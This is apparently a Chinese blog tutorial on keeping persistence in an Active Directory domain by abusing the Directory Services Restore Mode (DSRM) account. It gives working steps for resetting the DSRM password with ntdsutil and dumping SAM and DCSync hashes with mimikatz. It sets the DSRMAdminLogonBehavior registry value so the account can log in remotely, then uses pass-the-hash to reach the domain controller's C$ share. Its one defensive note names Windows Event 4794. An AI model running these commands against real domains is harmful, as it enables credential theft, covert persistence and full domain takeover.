【域权限维持】-DSRM Abuse

avatar
作者
猴君
阅读量:0

目录服务还原模式账户滥用

DSRM账户密码是安装DC的时候设置的,一般不会修改,该账户是域控的本地管理员账户,并非域的管理员帐户,存储在SAM文件中,所以DSRM密码同步之后并不会影响域的管理员帐户,另外,在下一次进行DSRM密码同步之前,NTLM Hash的值一直有效,且更改域内的administrator帐户,并不会影响DSRM帐户,持久化效果很好

1、首次配置DSRM是在安装域控制器时

在这里插入图片描述

2、使用ntdsutil重置DSRM账户的密码[域控上执行,建议直接用管理员权限的cmd]

ntdsutil set dsrm password #此处的null代表本机,其它机器需输入对应机器名 reset password on server null 连续输入两次新密码即可 

在这里插入图片描述

3、读取域控制器上的SAM文件保存的hash

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit 

在这里插入图片描述

读取域控制器上域administrator用户的hash

mimikatz.exe privilege::debug "lsadump::dcsync /domain:byjb.com /user:administrator /csv" exit 

在这里插入图片描述

4、新建注册表使DSRM账户可远程登录域控

要使用DSRM账户登录域控制器需满足以下注册表键值为2(该注册表键值默认不存在)需要有注册表键:HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior
该键值的类型的DWORD,共有以下几个选择
0:默认值,只有当域控制器重启并进入DSRM模式时,才可以使用DSRM管理员账号。
1:只有当本地AD、DS服务停止时,才可以使用DSRM管理员账号登录域控制器。
2:在任何情况下,都可以使用DSRM管理员账号登录域控制器。

在这里插入图片描述

5、域内成员机器使用mimikatz pth横向移动到域控,需先使用klist purge清理票据(避免受到干扰) 该命令会自动弹出一个cmd用于访问目标

mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:dc01 /user:administrator /ntlm:****" dir /a \\dc01\c$ 

未配置注册表值为2时,显示用户名或密码不正确
在这里插入图片描述

配置成功后

在这里插入图片描述

6、修改DSRM的另一个方式,直接同步其他域账户的hash

ntdsutil set dsrm password sync from domain account admin 

在这里插入图片描述

同步的hash是相同的
在这里插入图片描述

7、日志信息

Windows Event 4794
在这里插入图片描述

8、 操作注册表注册表的方式有很多,可以借助cmd,wmic,powershell等程序

注:此文章参考了很多的网络上的其他文章!!!

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!